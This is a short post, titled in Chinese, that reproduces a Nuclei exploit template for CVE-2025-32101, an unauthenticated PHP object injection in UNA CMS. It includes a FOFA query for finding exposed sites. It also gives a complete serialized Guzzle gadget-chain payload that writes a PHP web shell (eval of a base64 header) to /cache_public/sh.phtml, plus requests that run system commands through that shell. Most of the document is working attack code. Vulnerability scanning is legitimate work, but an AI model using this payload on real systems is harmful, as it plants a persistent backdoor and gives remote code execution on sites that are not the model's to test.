【通用】CVE-2025-32101 UNACMS rce

fofa语句

官方yaml

id: CVE-2025-32101

info:
  name: UNA CMS 14.0.0-RC - PHP Object Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script. Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this method, user input passed through the "profile_id" POST parameter is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as writing and executing arbitrary PHP code.
  reference:
    - https://www.exploit-db.com/exploits/52139
    - https://karmainsecurity.com/KIS-2025-01
  metadata:
    verified: true
    max-request: 3
    fofa-query: body="Powered by UNA"
  tags: cve,cve2025,una-cms,php,rce

variables:
  cmd: "echo '{{randstr}}'. system('id') . '{{randstr}}';"

http:
  - raw:
      - |
        POST /menu.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=O%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A3%3A%7Bs%3A40%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A2%3A%7Bs%3A7%3A%22Expires%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22Value%22%3Bs%3A49%3A%22%3C%3Fphp+eval%28base64_decode%28%24_SERVER%5B%27HTTP_X%27%5D%29%29%3B+%3F%3E%22%3B%7D%7D%7Ds%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A23%3A%22.%2Fcache_public%2Fsh.phtml%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7D

    matchers:
      - type: status
        internal: true
        status:
          - 200

  - raw:
      - |
        GET /cache_public/sh.phtml HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        X: {{base64(cmd)}}

      - |
        GET /cache_public/sh.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        X: {{base64(cmd)}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - 'Expires'
          - 'Value'
          - 'uid='
          - 'groups='
        condition: and

    extractors:
      - type: regex
        part: body
        internal: false
        name: id
        group: 1
        regex:
          - '{{randstr}}(.*){{randstr}}'
# digest: 4b0a00483046022100ed6e38e082455a41a9bec934b1e85c434af4c7987536b1e9e930e1d0cab86fd1022100fe8b85a7c6d4f7aa302a78889743504efe33b6347b10d687bba181a6cc4c17f0:922c64590222798bb761d5b6d8e72950